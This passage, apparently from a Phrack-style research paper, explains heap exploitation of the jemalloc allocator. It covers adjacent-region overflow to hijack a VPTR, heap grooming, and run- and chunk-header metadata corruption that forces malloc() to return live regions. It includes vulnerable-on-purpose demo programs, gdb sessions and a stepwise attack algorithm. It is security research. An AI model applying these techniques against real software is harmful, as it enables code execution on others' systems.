+Our next breakpoint is after the overflow of 'obj_a' into 'obj_b' and just
+before the first call of 'print()'. Our run now looks like the following:
+
+
+gdb $ x/40x 0xb7c01000
+0xb7c01000: 0xb7fd315c  0x00000000  0x00000052  0xfffffffc
+0xb7c01010: 0xffffffff  0x000fffff  0x00000000  0x00000000
+0xb7c01020: 0x00000000  0x00000000  0x00000000  0x00000000
+0xb7c01030: 0x00000000  0x00000000  0x00000000  0x00000000
+0xb7c01040: 0x080489e0  0x41414141  0x41414141  0x41414141
+0xb7c01050: 0x41414141  0x41414141  0x41414141  0x41414141
+0xb7c01060: 0x41414141  0x41414141  0x41414141  0x41414141
+0xb7c01070: 0x41414141  0x42424242  0x42424242  0x00004242
+0xb7c01080: 0x00000000  0x00000000  0x00000000  0x00000000
+0xb7c01090: 0x00000000  0x00000000  0x00000000  0x00000000
+gdb $ x/i $eip
+0x80486d1 <main(int, char**)+177>:   call   *(%eax)
+gdb $ print $eax
+$15 = 0x80489e0
+
+
+At 0x080486d1 is the call of 'print()' of 'obj_a'. At 0xb7c01070 we can see
+that we have overwritten the VPTR of 'obj_b' that was in an adjacent region
+to 'obj_a'. Finally, at the call of 'print()' by 'obj_b':
+
+
+gdb $ x/i $eip
+=> 0x80486d8 <main(int, char**)+184>:   call   *(%eax)
+gdb $ print $eax
+$16 = 0x41414141
+
+
+----[ 3.2 - Heap manipulation
+
+In order to be able to arrange the jemalloc heap in a predictable state we
+need to understand the allocator's behavior and use heap manipulation
+tactics to influence it to our advantage. In the context of browsers, heap
+manipulation tactics are usually referred to as 'Heap Feng Shui' after
+Alexander Sotirov's work [FENG].
+
+By 'predictable state' we mean that the heap must be arranged as reliably
+as possible in a way that we can position data where we want. This enables
+us to use the tactic of corrupting adjacent regions of the previous
+paragraph, but also to exploit use-after-free bugs. In use-after-free
+bugs a memory region is allocated, used, freed and then used again due
+to a bug. In such a case if we know the region's size we can manipulate
+the heap to place data of our own choosing in the freed region's memory
+slot on its run before it is used again. Upon its subsequent incorrect use
+the region now has our data that can help us hijack the flow of execution.
+
+To explore jemalloc's behavior and manipulate it into a predictable
+state we use an algorithm similar to the one presented in [HOEJ]. Since
+in the general case we cannot know beforehand the state of the runs of
+the class size we are interested in, we perform many allocations of this
+size hoping to cover the holes (i.e. free regions) in the existing runs
+and get a fresh run. Hopefully the next series of allocations we will
+perform will be on this fresh run and therefore will be sequential. As
+we have seen, sequential allocations on a largely empty run are also
+contiguous. Next, we perform such a series of allocations controlled by
+us. In the case we are trying to use the adjacent regions corruption
+tactic, these allocations are of the victim object/structure we have
+chosen to help us gain code execution when corrupted.
+
+The following step is to deallocate every second region in this last series
+of controlled victim allocations. This will create holes in between the
+victim objects/structures on the run of the size class we are trying to
+manipulate. Finally, we trigger the heap overflow bug forcing, due to the
+state we have arranged, jemalloc to place the vulnerable objects in holes 
+on the target run overflowing into the victim objects.
+
+Let's demonstrate the above discussion with an example (file test-holes.c
+in the code archive):
+
+
+#define TSIZE   0x10            /* target size class */
+#define NALLOC  500             /* number of allocations */
+#define NFREE   (NALLOC / 10)   /* number of deallocations */
+
+char *foo[NALLOC];
+char *bar[NALLOC];
+
+printf("step 1: controlled allocations of victim objects\n");
+
+for(i = 0; i < NALLOC; i++)
+{
+    foo[i] = malloc(TSIZE);
+    printf("foo[%d]:\t\t0x%x\n", i, (unsigned int)foo[i]);
+}
+
+printf("step 2: creating holes in between the victim objects\n");
+
+for(i = (NALLOC - NFREE); i < NALLOC; i += 2)
+{
+    printf("freeing foo[%d]:\t0x%x\n", i, (unsigned int)foo[i]);
+    free(foo[i]);
+}
+
+printf("step 3: fill holes with vulnerable objects\n");
+
+for(i = (NALLOC - NFREE + 1); i < NALLOC; i += 2)
+{
+    bar[i] = malloc(TSIZE);
+    printf("bar[%d]:\t0x%x\n", i, (unsigned int)bar[i]);
+}
+
+
+jemalloc's behavior can be observed in the output, remember that our target
+size class is 16 bytes:
+
+
+$ ./test-holes
+step 1: controlled allocations of victim objects
+foo[0]:             0x40201030
+foo[1]:             0x40201040
+foo[2]:             0x40201050
+foo[3]:             0x40201060
+foo[4]:             0x40201070
+foo[5]:             0x40201080
+foo[6]:             0x40201090
+foo[7]:             0x402010a0
+
+...
+
+foo[447]:           0x40202c50
+foo[448]:           0x40202c60
+foo[449]:           0x40202c70
+foo[450]:           0x40202c80
+foo[451]:           0x40202c90
+foo[452]:           0x40202ca0
+foo[453]:           0x40202cb0
+foo[454]:           0x40202cc0
+foo[455]:           0x40202cd0
+foo[456]:           0x40202ce0
+foo[457]:           0x40202cf0
+foo[458]:           0x40202d00
+foo[459]:           0x40202d10
+foo[460]:           0x40202d20
+
+...
+
+step 2: creating holes in between the victim objects
+freeing foo[450]:   0x40202c80
+freeing foo[452]:   0x40202ca0
+freeing foo[454]:   0x40202cc0
+freeing foo[456]:   0x40202ce0
+freeing foo[458]:   0x40202d00
+freeing foo[460]:   0x40202d20
+freeing foo[462]:   0x40202d40
+freeing foo[464]:   0x40202d60
+freeing foo[466]:   0x40202d80
+freeing foo[468]:   0x40202da0
+freeing foo[470]:   0x40202dc0
+freeing foo[472]:   0x40202de0
+freeing foo[474]:   0x40202e00
+freeing foo[476]:   0x40202e20
+freeing foo[478]:   0x40202e40
+freeing foo[480]:   0x40202e60
+freeing foo[482]:   0x40202e80
+freeing foo[484]:   0x40202ea0
+freeing foo[486]:   0x40202ec0
+freeing foo[488]:   0x40202ee0
+freeing foo[490]:   0x40202f00
+freeing foo[492]:   0x40202f20
+freeing foo[494]:   0x40202f40
+freeing foo[496]:   0x40202f60
+freeing foo[498]:   0x40202f80
+
+step 3: fill holes with vulnerable objects
+bar[451]:           0x40202c80
+bar[453]:           0x40202ca0
+bar[455]:           0x40202cc0
+bar[457]:           0x40202ce0
+bar[459]:           0x40202d00
+bar[461]:           0x40202d20
+bar[463]:           0x40202d40
+bar[465]:           0x40202d60
+bar[467]:           0x40202d80
+bar[469]:           0x40202da0
+bar[471]:           0x40202dc0
+bar[473]:           0x40202de0
+bar[475]:           0x40202e00
+bar[477]:           0x40202e20
+bar[479]:           0x40202e40
+bar[481]:           0x40202e60
+bar[483]:           0x40202e80
+bar[485]:           0x40202ea0
+bar[487]:           0x40202ec0
+bar[489]:           0x40202ee0
+bar[491]:           0x40202f00
+bar[493]:           0x40202f20
+bar[495]:           0x40202f40
+bar[497]:           0x40202f60
+bar[499]:           0x40202f80
+
+
+We can see that jemalloc works in a FIFO way; the first region freed is the
+first returned for a subsequent allocation request. Although our example
+mainly demonstrates how to manipulate the jemalloc heap to exploit adjacent
+region corruptions, our observations can also help us to exploit
+use-after-free vulnerabilities. When our goal is to get data of our own
+choosing in the same region as a freed region about to be used, jemalloc's
+FIFO behavior can he help us place our data in a predictable way.
+
+In the above discussion we have implicitly assumed that we can make
+arbitrary allocations and deallocations; i.e. that we have available in
+our exploitation tool belt allocation and deallocation primitives for
+our target size. Depending on the vulnerable application (that relies
+on jemalloc) this may or may not be straightforward. For example, if
+our target is a media player we may be able to control allocations by
+introducing an arbitrary number of metadata tags in the input file. In
+the case of Firefox we can of course use Javascript to implement our
+heap primitives.  But that's the topic of another paper.
+
+
+----[ 3.3 - Metadata corruption
+
+The final heap corruption primitive we will focus on is the corruption of
+metadata. We will once again remind you that since jemalloc is not based
+on freelists (it uses macro-based red black trees instead), unlink and
+frontlink exploitation techniques are not usable. We will instead pay
+attention on how we can force 'malloc()' return a pointer that points
+to already initialized heap regions.
+
+
+------[ 3.3.1 - Run (arena_run_t)
+
+We have already defined what a 'run' is in section 2.1.3. We will briefly
+remind the reader that a 'run' is just a collection of memory regions of
+equal size that starts with some metadata describing it. Recall that runs
+are always aligned to a multiple of the page size (0x1000 in most real
+life applications). The run metadata obey the layout shown in [2-3].
+
+For release builds the 'magic' field will not be present (that is,
+MALLOC_DEBUG is off by default). As we have already mentioned, each
+run contains a pointer to the bin whose regions it contains. The 'bin'
+pointer is read and dereferenced from 'arena_run_t' (see [2-3]) only
+during deallocation. On deallocation the region size is unknown, thus the
+bin index cannot be computed directly, instead, jemalloc will first find
+the run the memory to be freed is located and will then dereference the
+bin pointer stored in the run's header. From function 'arena_dalloc_small':
+
+
+arena_dalloc_small(arena_t *arena, arena_chunk_t *chunk, void *ptr,
+        arena_chunk_map_t *mapelm)
+{
+    arena_run_t *run;
+    arena_bin_t *bin;
+    size_t size;
+
+    run = (arena_run_t *)(mapelm->bits & ~pagesize_mask);
+    bin = run->bin;
+    size = bin->reg_size;
+
+
+On the other hand, during the allocation process, once the appropriate run
+is located, its 'regs_mask[]' bit vector is examined in search of a free
+region. Note that the search for a free region starts at
+'regs_mask[regs_minelm]' ('regs_minlem' holds the index of the first
+'regs_mask[]' element that has nonzero bits). We will exploit this fact to
+force 'malloc()' return an already allocated region.
+
+In a heap overflow situation it is pretty common for the attacker to be
+able to overflow a memory region which is not followed by other regions
+(like the wilderness chunk in dlmalloc, but in jemalloc such regions are
+not that special). In such a situation, the attacker will most likely be
+able to overwrite the run header of the next run. Since runs hold memory
+regions of equal size, the next page aligned address will either be a
+normal page of the current run, or will contain the metadata (header) of
+the next run which will hold regions of different size (larger or smaller,
+it doesn't really matter). In the first case, overwriting adjacent regions
+of the same run is possible and thus an attacker can use the techniques
+that were previously discussed in 3.1. The latter case is the subject of
+the following paragraphs.
+
+People already familiar with heap exploitation, may recall that it is
+pretty common for an attacker to control the last heap item (region in our
+case) allocated, that is the most recently allocated region is the one
+being overflown. Because of the importance of this situation, we believe
+it is essential to have a look at how we can leverage it to gain control
+of the target process.
+
+Let's first have a look at how the in-memory model of a run looks like
+(file test-run.c):
+
+
+char *first;
+
+first = (char *)malloc(16);
+printf("first = %p\n", first);
+memset(first, 'A', 16);
+
+breakpoint();
+
+free(first);
+
+
+The test program is compiled and a debugging build of jemalloc is loaded
+to be used with gdb.
+
+
+~$ gcc -g -Wall test-run.c -o test-run
+~$ export LD_PRELOAD=/usr/src/lib/libc/libc.so.7
+~$ gdb test-run
+GNU gdb 6.1.1 [FreeBSD]
+...
+(gdb) run
+...
+first = 0x28201030
+
+Program received signal SIGTRAP, Trace/breakpoint trap.
+main () at simple.c:14
+14        free(first);
+
+
+The call to malloc() returns the address 0x28201030 which belongs to the
+run at 0x28201000.
+
+
+(gdb) print *(arena_run_t *)0x28201000
+$1 = {bin = 0x8049838, regs_minelm = 0, nfree = 252,
+  regs_mask = {4294967294}}
+(gdb) print *(arena_bin_t *)0x8049838
+$2 = {runcur = 0x28201000, runs = {...}, reg_size = 16, run_size = 4096,
+  nregs = 253, regs_mask_nelms = 8, reg0_offset = 48}
+
+
+Oki doki, run 0x28201000 services the requests for memory regions of size
+16 as indicated by the 'reg_size' value of the bin pointer stored in the
+run header (notice that run->bin->runcur == run).
+
+Now let's proceed with studying a scenario that can lead to 'malloc()'
+exploitation. For our example let's assume that the attacker controls
+a memory region 'A' which is the last in its run.
+
+
+[run #1 header][RR...RA][run #2 header][RR...]
+
+
+In the simple diagram shown above, 'R' stands for a normal region which may
+or may not be allocated while 'A' corresponds to the region that belongs to
+the attacker, i.e. it is the one that will be overflown. 'A' does not
+strictly need to be the last region of run #1. It can also be any region of
+the run. Let's explore how from a region on run #1 we can reach the
+metadata of run #2 (file test-runhdr.c, also see [2-6]):
+
+
+unsigned char code[] = "\x61\x62\x63\x64";
+
+one = malloc(0x10);
+memset(one, 0x41, 0x10);
+printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
+
+two = malloc(0x10);
+memset(two, 0x42, 0x10);
+printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
+
+three = malloc(0x20);
+memset(three, 0x43, 0x20);
+printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);
+
+__asm__("int3");
+
+printf("[+] corrupting the metadata of region three's run\n");
+memcpy(two + 4032, code, 4);
+
+__asm__("int3");
+
+
+At the first breakpoint we can see that for size 16 the run is at
+0xb7d01000 and for size 32 the run is at 0xb7d02000:
+
+
+gdb $ r
+[Thread debugging using libthread_db enabled]
+[+] region one:     0xb7d01030: AAAAAAAAAAAAAAAA
+[+] region two:     0xb7d01040: BBBBBBBBBBBBBBBB
+[+] region three:   0xb7d02020: CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
+
+Program received signal SIGTRAP, Trace/breakpoint trap.
+
+gdb $ print arenas[0].bins[3].runcur
+$5 = (arena_run_t *) 0xb7d01000
+gdb $ print arenas[0].bins[4].runcur
+$6 = (arena_run_t *) 0xb7d02000
+
+
+The metadata of run 0xb7d02000 are:
+
+
+gdb $ x/30x 0xb7d02000
+0xb7d02000: 0xb7fd3134  0x00000000  0x0000007e  0xfffffffe
+0xb7d02010: 0xffffffff  0xffffffff  0x7fffffff  0x00000000
+0xb7d02020: 0x43434343  0x43434343  0x43434343  0x43434343
+0xb7d02030: 0x43434343  0x43434343  0x43434343  0x43434343
+0xb7d02040: 0x00000000  0x00000000  0x00000000  0x00000000
+
+
+After the memcpy() and at the second breakpoint:
+
+
+gdb $ x/30x 0xb7d02000
+0xb7d02000: 0x64636261  0x00000000  0x0000007e  0xfffffffe
+0xb7d02010: 0xffffffff  0xffffffff  0x7fffffff  0x00000000
+0xb7d02020: 0x43434343  0x43434343  0x43434343  0x43434343
+0xb7d02030: 0x43434343  0x43434343  0x43434343  0x43434343
+0xb7d02040: 0x00000000  0x00000000  0x00000000  0x00000000
+
+
+We can see that the run's metadata and specifically the address of the
+'bin' element (see [2-3]) has been overwritten. One way or the other, the
+attacker will be able to alter the contents of run #2's header, but once
+this has happened, what's the potential of achieving code execution?
+
+A careful reader would have already thought the obvious; one can overwrite
+the 'bin' pointer to make it point to a fake bin structure of his own.
+Well, this is not a good idea because of two reasons. First, the attacker
+needs further control of the target process in order to successfully
+construct a fake bin header somewhere in memory. Secondly, and most
+importantly, as it has already been discussed, the 'bin' pointer of a
+region's run header is dereferenced only during deallocation. A careful
+study of the jemalloc source code reveals that only 'run->bin->reg0_offset'
+is actually used (somewhere in 'arena_run_reg_dalloc()'), thus, from an
+attacker's point of view, the bin pointer is not that interesting
+('reg0_offset' overwrite may cause further problems as well leading to
+crashes and a forced interrupt of our exploit).
+
+Our attack consists of the following steps. The attacker overflows
+'A' and overwrites run #2's header. Then, upon the next malloc() of
+a size equal to the size serviced by run #2, the user will get as a
+result a pointer to a memory region of the previous run (run #1 in our
+example). It is important to understand that in order for the attack to
+work, the overflown run should serve regions that belong to any of the
+available bins. Let's further examine our case (file vuln-run.c):
+
+
+char *one, *two, *three, *four, *temp;
+char offset[sizeof(size_t)];
+int i;
+
+if(argc < 2)
+{
+    printf("%s <offset>\n", argv[0]);
+    return 0;
+}
+
+/* User supplied value for 'regs_minelm'. */
+*(size_t *)&offset[0] = (size_t)atol(argv[1]);
+
+printf("Allocating a chunk of 16 bytes just for fun\n");
+one = (char *)malloc(16);
+printf("one = %p\n", one);
+
+/* All those allocations will fall inside the same run. */
+printf("Allocating first chunk of 32 bytes\n");
+two = (char *)malloc(32);
+printf("two = %p\n", two);
+
+printf("Performing more 32 byte allocations\n");
+for(i = 0; i < 10; i++)
+{
+    temp = (char *)malloc(32);
+    printf("temp = %p\n", temp);
+}
+
+/* This will allocate a new run for size 64. */
+printf("Setting up a run for the next size class\n");
+three = (char *)malloc(64);
+printf("three = %p\n", three);
+
+/* Overwrite 'regs_minelm' of the next run. */
+breakpoint();
+memcpy(two + 4064 + 4, offset, 4);
+breakpoint();
+
+printf("Next chunk should point in the previous run\n");
+four = (char *)malloc(64);
+printf("four = %p\n", four);
+
+
+vuln-run.c requires the user to supply a value to be written on
+'regs_minelm' of the next run. To achieve reliable results we have to
+somehow control the memory contents at 'regs_mask[regs_minelm]' as well.
+By taking a closer look at the layout of 'arena_run_t', we can see that by
+supplying the value -2 for 'regs_minelm', we can force
+'regs_mask[regs_minelm]' to point to 'regs_minelm' itself. That is,
+'regs_minelm[-2] = -2' :)
+
+Well, depending on the target application, other values may also be
+applicable but -2 is a safe one that does not cause further problems in the
+internals of jemalloc and avoids forced crashes.
+
+From function 'arena_run_reg_alloc':
+
+
+static inline void *
+arena_run_reg_alloc(arena_run_t *run, arena_bin_t *bin)
+{
+	void *ret;
+	unsigned i, mask, bit, regind;
+
+	...
+
+	i = run->regs_minelm;
+	mask = run->regs_mask[i]; /* [3-4] */
+	if (mask != 0) {
+		/* Usable allocation found. */
+		bit = ffs((int)mask) - 1; /* [3-5] */
+
+		regind = ((i << (SIZEOF_INT_2POW + 3)) + bit); /* [3-6] */
+		...
+		ret = (void *)(((uintptr_t)run) + bin->reg0_offset
+		    + (bin->reg_size * regind)); /* [3-7] */
+
+		...
+		return (ret);
+	}
+
+	...
+}
+
+
+Initially, 'i' gets the value of 'run->regs_minelm' which is equal to -2.
+On the assignment at [3-4], 'mask' receives the value 'regs_mask[-2]' which
+happens to be the value of 'regs_minelm', that is -2. The binary
+representation of -2 is 0xfffffffe thus 'ffs()' (man ffs(3) for those who
+haven't used 'ffs()' before) will return 2, so, 'bit' will equal 1. As if
+it wasn't fucking tiring so far, at [3-6], 'regind' is computed as
+'((0xfffffffe << 5) + 1)' which equals 0xffffffc1 or -63. Now do the maths,
+for 'reg_size' values belonging to small-medium sized regions, the formula
+at [3-7] calculates 'ret' in such a way that 'ret' receives a pointer to a
+memory region 63 chunks backwards :)
+
+Now it's time for some hands on practice:
+
+
+~$ gdb ./vuln-run
+GNU gdb 6.1.1 [FreeBSD]
+...
+(gdb) run -2
+Starting program: vuln-run -2
+Allocating a chunk of 16 bytes just for fun
+one = 0x28202030
+Allocating first chunk of 32 bytes
+two = 0x28203020
+Performing more 32 byte allocations
+...
+temp = 0x28203080
+...
+Setting up a run for the next size class
+three = 0x28204040
+
+Program received signal SIGTRAP, Trace/breakpoint trap.
+main (argc=Error accessing memory address 0x0: Bad address.
+) at vuln-run.c:35
+35        memcpy(two + 4064 + 4, offset, 4);
+(gdb) c
+Continuing.
+
+Program received signal SIGTRAP, Trace/breakpoint trap.
+main (argc=Error accessing memory address 0x0: Bad address.
+) at vuln-run.c:38
+38        printf("Next chunk should point in the previous run\n");
+(gdb) c
+Continuing.
+Next chunk should point in the previous run
+four = 0x28203080
+
+Program exited normally.
+(gdb) q
+
+
+Notice how the memory region numbered 'four' (64 bytes) points exactly
+where the chunk named 'temp' (32 bytes) starts. Voila :)
+
+
+------[ 3.3.2 - Chunk (arena_chunk_t)
+
+In the previous section we described the potential of achieving arbitrary
+code execution by overwriting the run header metadata. Trying to cover
+all the possibilities, we will now focus on what the attacker can do
+once she is able to corrupt the chunk header of an arena. Although
+the probability of directly affecting a nearby arena is low, a memory
+leak or the indirect control of the heap layout by continuous bin-sized
+allocations can render the technique described in this section a useful
+tool in the attacker's hand.
+
+Before continuing with our analysis, let's set the foundations of the
+test case we will cover.
+
+[[Arena #1 header][R...R][C...C]]
+
+As we have already mentioned in the previous sections, new arena chunks
+are created at will depending on whether the current arena is full
+(that is, jemalloc is unable to find a non-full run to service the
+current allocation) or whether the target application runs on multiple
+threads. Thus a good way to force the initialization of a new arena chunk
+is to continuously force the target application to perform allocations,
+preferably bin-sized ones. In the figure above, letter 'R' indicates the
+presence of memory regions that are already allocated while 'C' denotes
+regions that may be free. By continuously requesting memory regions,
+the available arena regions may be depleted forcing jemalloc to allocate
+a new arena (what is, in fact, allocated is a new chunk called an arena
+chunk, by calling 'arena_chunk_alloc()' which usually calls 'mmap()').
+
+The low level function responsible for allocating memory pages (called
+'pages_map()'), is used by 'chunk_alloc_mmap()' in a way that makes it
+possible for several distinct arenas (and any possible arena extensions)
+to be physically adjacent. So, once the attacker requests a bunch of
+new allocations, the memory layout may resemble the following figure.
+
+[[Arena #1 header][R...R][C...C]][[Arena #2 header][...]]
+
+It is now obvious that overflowing the last chunk of arena #1 will
+result in the arena chunk header of arena #2 getting overwritten. It is
+thus interesting to take a look at how one can take advantage of such
+a situation.
+
+The following code is one of those typical vulnerable-on-purpose programs
+you usually come across in Phrack articles ;) The scenario we will be
+analyzing in this section is the following: The attacker forces the
+target application to allocate a new arena by controlling the heap
+allocations. She then triggers the overflow in the last region of the
+previous arena (the region that physically borders the new arena) thus
+corrupting the chunk header metadata (see [2-5] on the diagram). When the
+application calls 'free()' on any region of the newly allocated arena,
+the jemalloc housekeeping information is altered. On the next call to
+'malloc()', the allocator will return a region that points to already
+allocated space of (preferably) the previous arena. Take your time
+to carefully study the following snippet since it is essential for
+understanding this attack (full code in vuln-chunk.c):
+
+
+char *base1, *base2;
+char *p1, *p2, *p3, *last, *first;
+char buffer[1024];
+int fd, l;
+
+p1 = (char *)malloc(16);
+base1 = (char *)CHUNK_ADDR2BASE(p1);
+print_arena_chunk(base1);
+
+/* [3-8] */
+
+/* Simulate the fact that we somehow control heap allocations.
+ * This will consume the first chunk, and will force jemalloc
+ * to allocate a new chunk for this arena.
+ */
+last = NULL;
+
+while((base2 = (char *)CHUNK_ADDR2BASE((first = malloc(16)))) == base1)
+    last = first;
+
+print_arena_chunk(base2);
+
+/* [3-9] */
+
+/* Allocate one more region right after the first region of the
+ * new chunk. This is done for demonstration purposes only.
+ */
+p2 = malloc(16);
+
+/* This is how the chunks look like at this point:
+ *
+ *   [HAAAA....L][HFPUUUU....U]
+ *
+ * H: Chunk header
+ * A: Allocated regions
+ * L: The chunk pointed to by 'last'
+ * F: The chunk pointed to by 'first'
+ * P: The chunk pointed to by 'p2'
+ * U: Unallocated space
+ */
+fprintf(stderr, "base1: %p vs. base2: %p (+%d)\n",
+    base1, base2, (ptrdiff_t)(base2 - base1));
+
+fprintf(stderr, "p1: %p vs. p2: %p (+%d)\n",
+    p1, p2, (ptrdiff_t)(p2 - p1));
+
+/* [3-10] */
+
+if(argc > 1) {
+    if((fd = open(argv[1], O_RDONLY)) > 0) {
+        /* Read the contents of the given file. We assume this file
+         * contains the exploitation vector.
+         */
+        memset(buffer, 0, sizeof(buffer));
+        l = read(fd, buffer, sizeof(buffer));
+        close(fd);
+
+        /* Copy data in the last chunk of the previous arena chunk. */
+        fprintf(stderr, "Read %d bytes\n", l);
+        memcpy(last, buffer, l);
+    }
+}
+
+/* [3-11] */
+
+/* Trigger the bug by free()ing any chunk in the new arena. We
+ * can achieve the same results by deallocating 'first'.
+ */
+free(p2);
+print_region(first, 16);
+
+/* [3-12] */
+
+/* Now 'p3' will point to an already allocated region (in this
+ * example, 'p3' will overwhelm 'first').
+ */
+p3 = malloc(4096);
+
+/* [3-13] */
+
+fprintf(stderr, "p3 = %p\n", p3);
+memset(p3, 'A', 4096);
+
+/* 'A's should appear in 'first' which was previously zeroed. */
+print_region(first, 16);
+return 0;
+
+
+Before going further, the reader is advised to read the comments and the
+code above very carefully. You can safely ignore 'print_arena_chunk()'
+and 'print_region()', they are defined in the file lib.h found in the code
+archive and are used for debugging purposes only. The snippet is actually
+split in 6 parts which can be distinguished by their corresponding '[3-x]'
+tags. Briefly, in part [3-8], the vulnerable program performs a number
+of allocations in order to fill up the available space served by the
+first arena. This emulates the fact that an attacker somehow controls
+the order of allocations and deallocations on the target, a fair and
+very common prerequisite. Additionally, the last call to 'malloc()'
+(the one before the while loop breaks) forces jemalloc to allocate a new
+arena chunk and return the first available memory region. Part [3-9],
+performs one more allocation, one that will lie next to the first (that
+is the second region of the new arena). This final allocation is there
+for demonstration purposes only (check the comments for more details).
+
+Part [3-10] is where the actual overflow takes place and part [3-11]
+calls 'free()' on one of the regions of the newly allocated arena. Before
+explaining the rest of the vulnerable code, let's see what's going on when
+'free()' gets called on a memory region.
+
+
+void
+free(void *ptr)
+{
+  ...
+  if (ptr != NULL) {
+    ...
+    idalloc(ptr);
+  }
+}
+
+static inline void
+idalloc(void *ptr)
+{
+  ...
+  chunk = (arena_chunk_t *)CHUNK_ADDR2BASE(ptr); /* [3-14] */
+  if (chunk != ptr)
+    arena_dalloc(chunk->arena, chunk, ptr); /* [3-15] */
+  else
+    huge_dalloc(ptr);
+}
+
+
+The 'CHUNK_ADDR2BASE()' macro at [3-14] returns the pointer to the chunk
+that the given memory region belongs to. In fact, what it does is just
+a simple pointer trick to get the first address before 'ptr' that is
+aligned to a multiple of a chunk size (1 or 2 MB by default, depending
+on the jemalloc flavor used). If this chunk does not belong to a, so
+called, huge allocation, then the allocator knows that it definitely
+belongs to an arena. As previously stated, an arena chunk begins with
+a special header, called 'arena_chunk_t', which, as expected, contains
+a pointer to the arena that this chunk is part of.
+
+Now recall that in part [3-10] of the vulnerable snippet presented
+above, the attacker is able to overwrite the first few bytes of the next
+arena chunk. Consequently, the 'chunk->arena' pointer that points to
+the arena is under the attacker's control. From now on, the reader may
+safely assume that all functions called by 'arena_dalloc()' at [3-15]
+may receive an arbitrary value for the arena pointer:
+
+
+static inline void
+arena_dalloc(arena_t *arena, arena_chunk_t *chunk, void *ptr)
+{
+  size_t pageind;
+  arena_chunk_map_t *mapelm;
+  ...
+
+  pageind = (((uintptr_t)ptr - (uintptr_t)chunk) >> PAGE_SHIFT);
+  mapelm = &chunk->map[pageind];
+  ...
+
+  if ((mapelm->bits & CHUNK_MAP_LARGE) == 0) {
+    /* Small allocation. */
+    malloc_spin_lock(&arena->lock);
+    arena_dalloc_small(arena, chunk, ptr, mapelm);  /* [3-16] */
+    malloc_spin_unlock(&arena->lock);
+  }
+  else
+    arena_dalloc_large(arena, chunk, ptr); /* [3-17] */
+}
+
+
+Entering 'arena_dalloc()', one can see that the 'arena' pointer
+is not used a lot, it's just passed to 'arena_dalloc_small()'
+or 'arena_dalloc_large()' depending on the size class of the
+memory region being deallocated. It is interesting to note that the
+aforementioned size class is determined by inspecting 'mapelm->bits'
+which, hopefully, is under the influence of the attacker. Following
+the path taken by 'arena_dalloc_small()' results in many complications
+that will most probably ruin our attack (hint for the interested
+reader - pointer arithmetics performed by 'arena_run_reg_dalloc()'
+are kinda dangerous). For this purpose, we choose to follow function
+'arena_dalloc_large()':
+
+
+static void
+arena_dalloc_large(arena_t *arena, arena_chunk_t *chunk, void *ptr)
+{
+  malloc_spin_lock(&arena->lock);
+  ...
+
+  size_t pageind = ((uintptr_t)ptr - (uintptr_t)chunk) >>
+    PAGE_SHIFT; /* [3-18] */
+  size_t size = chunk->map[pageind].bits & ~PAGE_MASK; /* [3-19] */
+
+  ...
+  arena_run_dalloc(arena, (arena_run_t *)ptr, true);
+  malloc_spin_unlock(&arena->lock);
+}
+
+
+There are two important things to notice in the snippet above. The first
+thing to note is the way 'pageind' is calculated. Variable 'ptr' points
+to the start of the memory region to be free()'ed while 'chunk' is the
+address of the corresponding arena chunk. For a chunk that starts at
+e.g. 0x28200000, the first region to be given out to the user may start
+at 0x28201030 mainly because of the overhead involving the metadata of
+chunk, arena and run headers as well as their bitmaps. A careful reader
+may notice that 0x28201030 is more than a page far from the start
+of the chunk, so, 'pageind' is larger or equal to 1. It is for this
+purpose that we are mostly interested in overwriting 'chunk->map[1]'
+and not 'chunk->map[0]'. The second thing to catch our attention is
+the fact that, at [3-19], 'size' is calculated directly from the 'bits'
+element of the overwritten bitmap. This size is later converted to the
+number of pages comprising it, so, the attacker can directly affect the
+number of pages to be marked as free. Let's see 'arena_run_dalloc':
+
+
+static void
+arena_run_dalloc(arena_t *arena, arena_run_t *run, bool dirty)
+{
+  arena_chunk_t *chunk;
+  size_t size, run_ind, run_pages;
+
+  chunk = (arena_chunk_t *)CHUNK_ADDR2BASE(run);
+  run_ind = (size_t)(((uintptr_t)run - (uintptr_t)chunk)
+      >> PAGE_SHIFT);
+  ...
+
+  if ((chunk->map[run_ind].bits & CHUNK_MAP_LARGE) != 0)
+    size = chunk->map[run_ind].bits & ~PAGE_MASK;
+  else
+    ...
+  run_pages = (size >> PAGE_SHIFT); /* [3-20] */
+
+  /* Mark pages as unallocated in the chunk map. */
+  if (dirty) {
+    size_t i;
+
+    for (i = 0; i < run_pages; i++) {
+      ...
+      /* [3-21] */
+      chunk->map[run_ind + i].bits = CHUNK_MAP_DIRTY;
+    }
+
+    ...
+    chunk->ndirty += run_pages;
+    arena->ndirty += run_pages;
+  }
+  else {
+    ...
+  }
+  chunk->map[run_ind].bits = size | (chunk->map[run_ind].bits &
+      PAGE_MASK);
+  chunk->map[run_ind+run_pages-1].bits = size |
+      (chunk->map[run_ind+run_pages-1].bits & PAGE_MASK);
+
+
+  /* Page coalescing code - Not relevant for _this_ example. */
+  ...
+
+  /* Insert into runs_avail, now that coalescing is complete. */
+  /* [3-22] */
+  arena_avail_tree_insert(&arena->runs_avail, &chunk->map[run_ind]);
+
+  ...
+}
+
+
+Continuing with our analysis, one can see that at [3-20] the same
+size that was calculated in 'arena_dalloc_large()' is now converted
+to a number of pages and then all 'map[]' elements that correspond to
+these pages are marked as dirty (notice that 'dirty' argument given
+to 'arena_run_dalloc()' by 'arena_dalloc_large()' is always set to
+true). The rest of the 'arena_run_dalloc()' code, which is not shown
+here, is responsible for forward and backward coalescing of dirty
+pages. Although not directly relevant for our demonstration, it's
+something that an attacker should keep in mind while developing a real
+life reliable exploit.
+
+Last but not least, it's interesting to note that, since the attacker
+controls the 'arena' pointer, the map elements that correspond to the
+freed pages are inserted in the given arena's red black tree. This can be
+seen at [3-22] where 'arena_avail_tree_insert()' is actually called. One
+may think that since red-black trees are involved in jemalloc, she can
+abuse their pointer arithmetics to achieve a '4bytes anywhere' write
+primitive. We urge all interested readers to have a look at rb.h, the
+file that contains the macro-based red black tree implementation used
+by jemalloc (WARNING: don't try this while sober).
+
+Summing up, our attack algorithm consists of the following steps:
+
+1) Force the target application to perform a number of allocations until a
+new arena is eventually allocated or until a neighboring arena is reached
+(call it arena B). This is mostly meaningful for our demonstration codes,
+since, in real life applications chances are that more than one chunks
+and/or arenas will be already available during the exploitation process.
+
